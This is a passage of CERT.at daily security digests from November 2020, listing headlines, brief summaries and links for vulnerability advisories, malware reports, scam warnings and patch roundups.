---------------------------------------------
https://www.zdnet.com/article/hackers-are-targeting-macos-users-with-this-u…
∗∗∗ Whac-A-Mole: Six Years of DNS Spoofing. (arXiv:2011.12978v1 [cs.CR]) ∗∗∗
---------------------------------------------
DNS is important in nearly all interactions on the Internet. All large DNS operators use IP anycast, announcing servers in BGP from multiple physical locations to reduce client latency and provide capacity. However, DNS is easy to spoof: third parties intercept and respond to queries for benign or malicious purposes. Spoofing is of particular risk for services using anycast, since service is already announced from multiple origins.
---------------------------------------------
http://arxiv.org/abs/2011.12978
=====================
= Vulnerabilities =
=====================
∗∗∗ Security update: Flaw in Trend Micro ServerProtect endangers Linux systems ∗∗∗
---------------------------------------------
A patched version of Trend Micro ServerProtect for Linux is available.
---------------------------------------------
https://heise.de/-4974321
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (c-ares, libass, raptor, rclone, and swtpm), Debian (libproxy, qemu, tcpflow, and x11vnc), Fedora (asterisk, c-ares, microcode_ctl, moodle, pam, tcpdump, and webkit2gtk3), Mageia (jruby and webkit2), openSUSE (buildah, c-ares, ceph, fontforge, java-1_8_0-openjdk, kernel, LibVNCServer, mariadb, thunderbird, ucode-intel, and wireshark), Red Hat (firefox, rh-mariadb103-mariadb and rh-mariadb103-galera, and thunderbird), SUSE (binutils, libssh2_org, [...]
---------------------------------------------
https://lwn.net/Articles/838579/
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects TXSeries for Multiplatforms ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: IBM QRadar Network Security is affected by Network Time Protocol (NTP) vulnerabilities (CVE-2020-11868, CVE-2020-13817) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-network-securi…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects TXSeries for Multiplatforms ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affects IBM Content Classification ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Content Classification ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Content Classification is affected by an Eclipse Jetty (Publicly disclosed vulnerability) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-content-classificatio…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM CICS TX on Cloud ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: Eclipse Jetty (Publicly disclosed vulnerability) affects Content Classification ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-eclipse-jetty-publicly-di…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM CICS TX on Cloud ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 26-11-2020 18:00 − Friday 27-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Beware of identity theft: Criminals are sending fraudulent e-mails in the name of the Post! ∗∗∗
---------------------------------------------
Numerous readers are currently reporting to us a fraudulent e-mail that is being sent in the name of Österreichische Post. In this e-mail you are asked to send a copy of your ID so that a delivery can be processed. Ignore this e-mail. It is a scam!
---------------------------------------------
https://www.watchlist-internet.at/news/achtung-identitaetsdiebstahl-krimine…
∗∗∗ Security updates: Archives containing malicious code could endanger Drupal websites ∗∗∗
---------------------------------------------
The Drupal developers have closed two dangerous security holes in the Drupal content management system.
---------------------------------------------
https://heise.de/-4972845
∗∗∗ Hunting Active Directory with BloodHound ∗∗∗
---------------------------------------------
At its SO-CON, SpecterOps showed many updates to security tools, including BloodHound 4.0 for Active Directory attacks.
---------------------------------------------
https://heise.de/-4973049
∗∗∗ Hackers Love Expired Domains ∗∗∗
---------------------------------------------
Sometimes, website owners no longer want to own a domain name and they allow it to expire without attempting to renew it. This happens all the time and is totally normal, but it’s important to remember that attackers regularly monitor domain expirations and may target certain domains that meet specific criteria. Vendor domains can be an easy backdoor. A vendor (supplier) domain is defined as a website that is used to host and load third-party JavaScript resources [...]
---------------------------------------------
https://blog.sucuri.net/2020/11/hackers-love-expired-domains.html
∗∗∗ Digitally Signed Bandook Malware Once Again Targets Multiple Sectors ∗∗∗
---------------------------------------------
A cyberespionage group with suspected ties to the Kazakh and Lebanese governments has unleashed a new wave of attacks against a multitude of industries with a retooled version of a 13-year-old backdoor Trojan. Check Point Research called out hackers affiliated with a group named Dark Caracal in a new report published yesterday for their efforts to deploy "dozens of digitally signed variants" of [...]
---------------------------------------------
https://thehackernews.com/2020/11/digitally-signed-bandook-malware-once.html
=====================
= Vulnerabilities =
=====================
∗∗∗ Citrix Virtual Apps and Desktops Security Update ∗∗∗
---------------------------------------------
2020-11-25: Improved clarification on when a version is impacted and added that 1912 LTSR CU2 is now available
---------------------------------------------
https://support.citrix.com/article/CTX285059
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (go, libxml2, postgresql, and wireshark-cli), Debian (drupal7 and lxml), Fedora (drupal7, java-1.8.0-openjdk-aarch32, libxml2, pacemaker, slurm, and swtpm), openSUSE (c-ares, ceph, chromium, dash, firefox, go1.14, java-1_8_0-openjdk, kernel, krb5, perl-DBI, podman, postgresql10, postgresql12, rclone, slurm, ucode-intel, wireshark, wpa_supplicant, and xen), SUSE (ceph, firefox, kernel, LibVNCServer, and python), and Ubuntu (freerdp, poppler, and [...]
---------------------------------------------
https://lwn.net/Articles/838469/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 25-11-2020 18:00 − Thursday 26-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Risk Based Authentication: The crutch for passwords and how it is exploited ∗∗∗
---------------------------------------------
With the risk assessment RBA, online services want to combat password abuse. But cybercrime turns it into a business: with digital doppelgangers.
---------------------------------------------
https://heise.de/-4970547
∗∗∗ What is SIM swapping and how can you protect yourself ∗∗∗
---------------------------------------------
This attack is about your phone number, specifically about taking it away from you.
---------------------------------------------
https://www.welivesecurity.com/deutsch/2020/11/26/was-ist-sim-swapping-und-…
∗∗∗ Caution! Downloading these apps turns out to be an expensive subscription trap! ∗∗∗
---------------------------------------------
There are many helpful apps for the phone that can make life easier. However, there are also apps that make life harder. Apps keep appearing in Google Play or the App Store that sign users up for unwanted and expensive subscriptions. The costs are either not mentioned at all or hidden, barely visible, in the fine print. We show you how to protect yourself from this scam.
---------------------------------------------
https://www.watchlist-internet.at/news/vorsicht-der-download-dieser-apps-en…
∗∗∗ 71 victims since September: Researchers warn of Egregor ransomware ∗∗∗
---------------------------------------------
The actors behind it have so far been active in 19 countries. The majority of the victims, however, are located in the USA. Thanks to sophisticated code obfuscation, security researchers have so far been unable to fully determine Egregor's infection vector.
---------------------------------------------
https://www.zdnet.de/88390072/71-opfer-seit-september-forscher-warnen-vor-r…
∗∗∗ Analysis of Kinsing Malware's Use of Rootkit ∗∗∗
---------------------------------------------
The Kinsing malware has been evolving with capabilities added to increase the difficulty of detection. Trend Micro reports on the use of a rootkit in recent samples to carry out these objectives.
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/6d8ebd5da62cf61982fce04b20b…
=====================
= Vulnerabilities =
=====================
∗∗∗ Drupal core - Critical - Arbitrary PHP code execution - SA-CORE-2020-013 ∗∗∗
---------------------------------------------
The Drupal project uses the PEAR Archive_Tar library. The PEAR Archive_Tar library has released a security update that impacts Drupal.
---------------------------------------------
https://www.drupal.org/sa-core-2020-013
∗∗∗ Synology: Critical holes removed from Disk Station Manager and Safe Access ∗∗∗
---------------------------------------------
Through security holes, attackers could remotely execute program code on vulnerable devices. Some of the patched versions are still outstanding.
---------------------------------------------
https://heise.de/-4971807
∗∗∗ Researcher accidentally discovers zero-day hole in Windows 7 and Server 2008 ∗∗∗
---------------------------------------------
It allows an unauthorized elevation of user privileges. Newer Windows versions are not affected. The researcher came across the bug while working on an update for his security tool PrivescCheck.
---------------------------------------------
https://www.zdnet.de/88390077/forscher-entdeckt-zufaellig-zero-day-luecke-i…
∗∗∗ BlackBerry Powered by Android Security Bulletin - November 2020 ∗∗∗
---------------------------------------------
https://support.blackberry.com/kb/articleDetail?language=en_US&articleNumbe…
∗∗∗ BigBlueButton E-mail Validation Bypass ∗∗∗
---------------------------------------------
https://cxsecurity.com/issue/WLB-2020110211
∗∗∗ BigBlueButton Meeting Access Code Brute Force Vulnerability ∗∗∗
---------------------------------------------
https://cxsecurity.com/issue/WLB-2020110210
∗∗∗ Security Bulletin: IBM Cloud Pak for Security (CP4S) could reveal sensitive information to authenticated user (CVE-2020-4626) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-securit…
∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM Java Runtime affect IBM Cognos Command Center ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Cloud Pak for Security (CP4S) uses weaker than expected cryptographic algorithms (CVE-2020-4624) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-securit…
∗∗∗ Security Bulletin: IBM Network Performance Insight is affected by Apache Commons Codec vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-network-performance-i…
∗∗∗ Security Bulletin: IBM Cloud Pak for Security (CP4S) vulnerable to session handling issue (CVE-2020-4696) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-securit…
∗∗∗ Security Bulletin: CP4S 1.3.0.1 fails to use HTTPOnly flag (CVE-2020-4625) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cp4s-1-3-0-1-fails-to-use…
∗∗∗ Security Bulletin: IBM Cloud Pak for Security (CP4S) is potentially vulnerable to CVS injection (CVE-2020-4627) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-securit…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 24-11-2020 18:00 − Wednesday 25-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Light-Based Attacks Expand in the Digital Home ∗∗∗
---------------------------------------------
The team that hacked Amazon Echo and other smart speakers using a laser pointer continue to investigate why MEMS microphones respond to sound.
---------------------------------------------
https://threatpost.com/light-based-attacks-digital-home/161583/
∗∗∗ [SANS ISC] Live Patching Windows API Calls Using PowerShell ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: “Live Patching Windows API Calls Using PowerShell“: It’s amazing how attackers can be imaginative when it comes to protecting themselves and preventing security controls to do their job. Here is an example of a malicious PowerShell script that patches live a DLL function [...]
---------------------------------------------
https://blog.rootshell.be/2020/11/25/sans-isc-live-patching-windows-api-cal…
∗∗∗ IBM: Current security updates protect various products against attacks ∗∗∗
---------------------------------------------
Vulnerabilities rated from "Low" to "High" have been removed from Netezza Host Management, Resilient, Spectrum Protect (Plus), TNPM Wireline and other products.
---------------------------------------------
https://heise.de/-4970430
∗∗∗ Stantinko Proxy Trojan Masquerades as Apache Servers ∗∗∗
---------------------------------------------
A threat group tracked as Stantinko was observed using a new version of a Linux proxy Trojan that poses as Apache servers to remain undetected.
---------------------------------------------
https://www.securityweek.com/stantinko-proxy-trojan-masquerades-apache-serv…
∗∗∗ This critical software flaw is now being used to break into networks - so update fast ∗∗∗
---------------------------------------------
A vulnerability in MobileIron mobile device management software is being used by state-backed hackers and organised crime, warns security agency.
---------------------------------------------
https://www.zdnet.com/article/this-software-flaw-is-being-used-to-break-int…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security holes in McAfee Endpoint Security make Windows attackable ∗∗∗
---------------------------------------------
There are important updates for McAfee Endpoint Security. Under certain conditions, attackers could execute malicious code.
---------------------------------------------
https://heise.de/-4970655
∗∗∗ 2-Factor Authentication Bypass Flaw Reported in cPanel and WHM Software ∗∗∗
---------------------------------------------
cPanel, a provider of popular administrative tools to manage web hosting, has patched a security vulnerability that could have allowed remote attackers with access to valid credentials to bypass two-factor authentication (2FA) protection on an account. The issue, tracked as "SEC-575" and discovered by researchers from Digital Defense, has been remedied by the company in versions 11.92.0.2, [...]
---------------------------------------------
https://thehackernews.com/2020/11/2-factor-authentication-bypass-flaw.html
∗∗∗ Cisco DNA Spaces Connector Command Injection Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the web-based management interface of Cisco DNA Spaces Connector could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device. The vulnerability is due to insufficient validation of user-supplied input in the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface. A successful exploit could allow the attacker to execute arbitrary [...]
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Cisco Edge Fog Fabric Resource Exposure Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the REST API of Cisco Edge Fog Fabric could allow an authenticated, remote attacker to access files outside of their authorization sphere on an affected device. The vulnerability is due to incorrect authorization enforcement on an affected system. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device.
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ VMSA-2020-0023.3 VMware ESXi, Workstation, Fusion and NSX-T updates address multiple security vulnerabilities (CVE-2020-3981, CVE-2020-3982, CVE-2020-3992, CVE-2020-3993, CVE-2020-3994, CVE-2020-3995) ∗∗∗
---------------------------------------------
Updated security advisory to add VMware Cloud Foundation 3.x and 4.x versions in the response matrix of section 3(a).
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0023.html
∗∗∗ VMSA-2020-0026.1 VMware ESXi, Workstation and Fusion updates address use-after-free and privilege escalation vulnerabilities (CVE-2020-4004, CVE-2020-4005) ∗∗∗
---------------------------------------------
Updated security advisory to add VMware Cloud Foundation 3.x and 4.x versions in the response matrix of sections 3(a) and 3(b).
---------------------------------------------
https://www.vmware.com/security/advisories/VMSA-2020-0026.html
∗∗∗ ICS Advisory (ICSA-20-329-02) Fuji Electric V-Server Lite ∗∗∗
---------------------------------------------
Successful exploitation of this vulnerability could allow for remote code execution on the device.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-329-02
∗∗∗ ICS Advisory (ICSA-20-329-01) Rockwell Automation FactoryTalk Linx ∗∗∗
---------------------------------------------
Successful exploitation of these vulnerabilities could allow a denial-of-service condition, remote code execution, or leak information that could be used to bypass address space layout randomization (ASLR).
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-329-01
∗∗∗ MISP: Vulnerability allows bypassing of security measures ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1170
∗∗∗ Red Hat Virtualization: Multiple vulnerabilities ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1169
∗∗∗ NETGEAR GS108Ev3 vulnerable to cross-site request forgery ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN27806339/
∗∗∗ Security Advisory - Command Injection Vulnerability in ManageOne Product ∗∗∗
---------------------------------------------
https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201125…
∗∗∗ Security Advisory - Out-of-bounds Read Vulnerability in Some Huawei Smartphones ∗∗∗
---------------------------------------------
https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201125…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 23-11-2020 18:00 − Tuesday 24-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Waiting for patches: Critical VMware hole endangers Linux and Windows systems ∗∗∗
---------------------------------------------
VMware software can be attacked via a zero-day hole. So far there are only workarounds for protection.
---------------------------------------------
https://heise.de/-4969353
∗∗∗ Fraudulent trading platforms: Criminals advertise with comments on YouTube videos ∗∗∗
---------------------------------------------
In the comments of numerous popular YouTube videos – including Last Christmas by Wham! – there are tips on how to get rich with Bitcoin trading on the Internet. Wrapped in a highly emotional story, a user reports how a certain Lyra Holt Dean helped him with trading. In the comment he also gives her e-mail address. Do not write to this address under any circumstances; it is a scam!
---------------------------------------------
https://www.watchlist-internet.at/news/betruegerische-trading-plattformen-k…
∗∗∗ Lookalike domains and how to outfox them ∗∗∗
---------------------------------------------
Our approach is more complex than simply registering lookalike domains to the company and enables real-time blocking of attacks that use such domains as soon as they appear.
---------------------------------------------
https://securelist.com/lookalike-domains-and-how-to-outfox-them/99539/
∗∗∗ Blackrota, a heavily obfuscated backdoor written in Go ∗∗∗
---------------------------------------------
Recently, a malicious backdoor program written in the Go language that exploits an unauthorized access vulnerability in the Docker Remote API was caught by our Anglerfish honeypot. We named it Blackrota, given that its C2 domain name is [...]
---------------------------------------------
https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-…
∗∗∗ Hidden SEO Spam Link Injections on WordPress Sites ∗∗∗
---------------------------------------------
Often when a website is injected with SEO spam, the owner is completely unaware of the issue until they begin to receive warnings from search engines or blacklists. This is by design - attackers intentionally try to prevent detection by arranging injected links so they are not visible to average human traffic. One of the techniques attackers use is to “push” the injected SEO spam links off the visible portion of the website.
---------------------------------------------
https://blog.sucuri.net/2020/11/hidden-seo-spam-link-injections-on-wordpres…
∗∗∗ MedusaLocker Ransomware Analysis ∗∗∗
---------------------------------------------
The Cybereason Nocturnus Team has published an analysis of the MedusaLocker ransomware. MedusaLocker targets Windows systems and first appeared in 2019. Since then, it has reportedly been involved in many attacks targeting a number of industry sectors, but especially the healthcare sector.
---------------------------------------------
https://exchange.xforce.ibmcloud.com/collection/9b5a2bd4954b29920abc8f39f0a…
=====================
= Vulnerabilities =
=====================
∗∗∗ Citrix Hypervisor Security Update ∗∗∗
---------------------------------------------
A security issue has been identified that may allow privileged code running in a guest VM to compromise the host. This issue is limited to only those guest VMs where the host administrator has explicitly assigned a PCI passthrough device to the guest VM.
---------------------------------------------
https://support.citrix.com/article/CTX286511
∗∗∗ Xen Security Advisory XSA-355 - stack corruption from XSA-346 change ∗∗∗
---------------------------------------------
A malicious or buggy HVM or PVH guest can cause Xen to crash, resulting in a Denial of Service (DoS) to the entire host. Privilege escalation as well as information leaks cannot be excluded.
---------------------------------------------
https://xenbits.xen.org/xsa/advisory-355.html
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (chromium, microcode_ctl, and seamonkey), Mageia (f2fs-tools, italc, python-cryptography, python-pillow, tcpreplay, and vino), Oracle (thunderbird), Red Hat (bind, kernel, microcode_ctl, net-snmp, and Red Hat Virtualization), Scientific Linux (net-snmp and thunderbird), SUSE (kernel and mariadb), and Ubuntu (atftp, libextractor, pdfresurrect, and pulseaudio).
---------------------------------------------
https://lwn.net/Articles/838255/
∗∗∗ Synology-SA-20:25 Safe Access ∗∗∗
---------------------------------------------
Multiple vulnerabilities allow remote attackers to execute arbitrary code via a susceptible version of Safe Access.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_20_25
∗∗∗ Red Hat JBoss Enterprise Application Platform: vulnerability allows SQL injection ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1161
∗∗∗ OTRS: multiple vulnerabilities allow disclosure of information ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1159
∗∗∗ Security Bulletin: IBM TNPM Wireline is vulnerable to Apache Commons Codec. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-tnpm-wireline-is-vuln…
∗∗∗ Security Bulletin: IBM Resilient SOAR is Using Components with Known Vulnerabilities – IBM SDK, Java Technology Edition v8.0.6.11 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-soar-is-usi…
∗∗∗ Security Bulletin: IBM API Connect is vulnerable to arbitrary code execution and security bypass in Drupal (CVE-2020-13664, CVE-2020-13665) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-vulner…
∗∗∗ [20201107] - Core - Write ACL violation in multiple core views ∗∗∗
---------------------------------------------
https://developer.joomla.org:443/security-centre/834-20201107-core-write-ac…
∗∗∗ [20201106] - Core - CSRF in com_privacy emailexport feature ∗∗∗
---------------------------------------------
https://developer.joomla.org:443/security-centre/833-20201106-core-csrf-in-…
∗∗∗ [20201105] - Core - User Enumeration in backend login ∗∗∗
---------------------------------------------
https://developer.joomla.org:443/security-centre/832-20201105-core-user-enu…
∗∗∗ [20201104] - Core - SQL injection in com_users list view ∗∗∗
---------------------------------------------
https://developer.joomla.org:443/security-centre/831-20201104-core-sql-inje…
∗∗∗ [20201103] - Core - Path traversal in mod_random_image ∗∗∗
---------------------------------------------
https://developer.joomla.org:443/security-centre/830-20201103-core-path-tra…
∗∗∗ [20201102] - Core - Disclosure of secrets in Global Configuration page ∗∗∗
---------------------------------------------
https://developer.joomla.org:443/security-centre/829-20201102-core-disclosu…
∗∗∗ [20201101] - Core - com_finder ignores access levels on autosuggest ∗∗∗
---------------------------------------------
https://developer.joomla.org:443/security-centre/828-20201101-core-com-find…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 20-11-2020 18:00 − Monday 23-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Patch now! Exploit code threatens almost 50,000 Fortinet VPNs ∗∗∗
---------------------------------------------
The situation around a one-year-old vulnerability in Fortinet VPN systems is coming to a head. Security patches have been available for a long time.
---------------------------------------------
https://heise.de/-4968392
∗∗∗ GitHub fixes high severity security flaw spotted by Google ∗∗∗
---------------------------------------------
Two weeks after Google disclosed a security flaw in GitHub, the Microsoft-owned site has fixed the issue.
---------------------------------------------
https://www.zdnet.com/article/github-fixes-high-severity-security-flaw-spot…
∗∗∗ Botnets scan en masse for credentials in unsecured ENV files ∗∗∗
---------------------------------------------
These store configuration data for environments such as Docker, Node.js and Symfony. Security vendors recently found more than 1,100 active scanners for ENV files. Through them, hackers can in some cases gain access to servers in order to steal data and inject malware.
---------------------------------------------
https://www.zdnet.de/88389948/botnetze-suchen-massenhaft-nach-anmeldedaten-…
∗∗∗ FBI warns of increasing Ragnar Locker ransomware activity ∗∗∗
---------------------------------------------
The U.S. Federal Bureau of Investigation (FBI) Cyber Division has warned private industry partners of increased Ragnar Locker ransomware activity following a confirmed attack from April 2020.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fbi-warns-of-increasing-ragn…
∗∗∗ LightBot: TrickBot’s new reconnaissance malware for high-value targets ∗∗∗
---------------------------------------------
The notorious TrickBot gang has released a new lightweight reconnaissance tool used to scope out an infected victim's network for high-value targets.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reco…
∗∗∗ TrickBot turns 100: Latest malware released with new features ∗∗∗
---------------------------------------------
The TrickBot cybercrime gang has released the hundredth version of the TrickBot malware with additional features to evade detection.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/trickbot-turns-100-latest-ma…
∗∗∗ PYSA/Mespinoza Ransomware ∗∗∗
---------------------------------------------
Over the course of 8 hours the PYSA/Mespinoza threat actors used Empire and Koadic as well as RDP to move laterally throughout the environment, grabbing credentials from as many [...]
---------------------------------------------
https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
=====================
= Vulnerabilities =
=====================
∗∗∗ ICS Advisory (ICSA-20-324-05) Mitsubishi Electric MELSEC iQ-R Series ∗∗∗
---------------------------------------------
Successful exploitation of this vulnerability could cause a denial-of-service condition for the affected product.
---------------------------------------------
https://us-cert.cisa.gov/ics/advisories/icsa-20-324-05
∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2020-0008 ∗∗∗
---------------------------------------------
Date Reported: November 23, 2020
Advisory ID: WSA-2020-0008
CVE identifiers: CVE-2020-13584, CVE-2020-9948, CVE-2020-9951, CVE-2020-9952, CVE-2020-9983.
Several vulnerabilities were discovered in WebKitGTK and WPE WebKit.
---------------------------------------------
https://webkitgtk.org/security/WSA-2020-0008.html
∗∗∗ Multiple Vulnerabilities in ZTE WLAN router MF253V ∗∗∗
---------------------------------------------
https://sec-consult.com/./en/blog/advisories/multiple-vulnerabilities-in-zt…
∗∗∗ HCL Domino: multiple vulnerabilities allow denial of service ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1155
∗∗∗ Opera Mini for Android: vulnerability allows display of false information ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1152
∗∗∗ Trend Micro ServerProtect: vulnerability allows privilege escalation ∗∗∗
---------------------------------------------
https://www.cert-bund.de/advisoryshort/CB-K20-1150
∗∗∗ WordPress Fancy Product Designer For WooCommerce 4.5.1 File Upload ∗∗∗
---------------------------------------------
https://cxsecurity.com/issue/WLB-2020110179
∗∗∗ [webapps] TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass ∗∗∗
---------------------------------------------
https://www.exploit-db.com/exploits/49092
∗∗∗ Security Bulletin: IBM Spectrum Protect Server allows Triple DES (3DES) ciphers to be used (CVE-2018-1785) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spectrum-protect-serv…
∗∗∗ Security Bulletin: Improper Authentication of Websocket Endpoint in IBM Spectrum Protect Operations Center ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-improper-authentication-o…
∗∗∗ Security Bulletin: Vulnerabilities in IBM Java Runtime, IBM WebSphere Application Server Liberty, and Apache Commons affect IBM Spectrum Protect Operations Center and IBM Spectrum Protect Client Management Service ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja…
∗∗∗ Security Bulletin: Vulnerabilities in IBM Db2 and IBM Java Runtime affect IBM Spectrum Protect Server ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-db…
∗∗∗ Security Bulletin: Vulnerabilities in jQuery, Spring, Dom4j, MongoDB, Linux Kernel, Targetcli-fb, Jackson, Node.js, and Apache Commons affect IBM Spectrum Protect Plus ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-jquery…
∗∗∗ Security Bulletin: Static Credential Vulnerability in IBM Spectrum Protect Plus (CVE-2020-4854) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-static-credential-vulnera…
∗∗∗ Security Bulletin: IBM Spectrum Protect Plus allows use of TLS Version 1.1 protocols (CVE-2020-4783) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spectrum-protect-plus…
∗∗∗ Security Bulletin: Vulnerability in Python affects IBM Spectrum Protect Plus Microsoft Windows File Systems agent (CVE-2020-15801) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-python-a…
∗∗∗ Security Bulletin: Vulnerability in IBM WebSphere Application Server Liberty affects IBM Spectrum Protect Backup-Archive Client web user interface, IBM Spectrum Protect for Space Management, and IBM Spectrum Protect for Virtual Environments ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-webs…
∗∗∗ Security Bulletin: Vulnerabilities in Apache Commons and Log4j affect IBM Spectrum Protect Backup-Archive Client and IBM Spectrum Protect for Virtual Environments ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-apache…
∗∗∗ Security Bulletin: IBM Java Runtime Vulnerabilities affect the IBM Spectrum Protect Backup-Archive Client, IBM Spectrum Protect for Space Management, and IBM Spectrum Protect for Virtual Environments ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-runtime-vulnerab…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 19-11-2020 18:00 − Friday 20-11-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ IAM-Driven Biometrics: The Security Issues with Biometric Identity and Access Management ∗∗∗
---------------------------------------------
The increase in cybersecurity incidents brings with it a higher demand for enhanced security protections. Thus, in an attempt to prevent unauthorized third parties from accessing their accounts and sensitive data, companies are increasingly turning to biometric authentication. Contemporary Identity and Access Management (IAM) technologies have moved beyond basic login methods based on usernames and passwords.
---------------------------------------------
https://heimdalsecurity.com/blog/iam-driven-biometrics/
∗∗∗ [SANS ISC] Malicious Python Code and LittleSnitch Detection ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: “Malicious Python Code and LittleSnitch Detection”: We all run plenty of security tools on our endpoints. Their goal is to protect us by preventing infection (or trying to prevent it). But all those security tools are present on our devices like normal applications
---------------------------------------------
https://blog.rootshell.be/2020/11/20/sans-isc-malicious-python-code-and-lit…
∗∗∗ The malware that usually installs ransomware and you need to remove right away ∗∗∗
---------------------------------------------
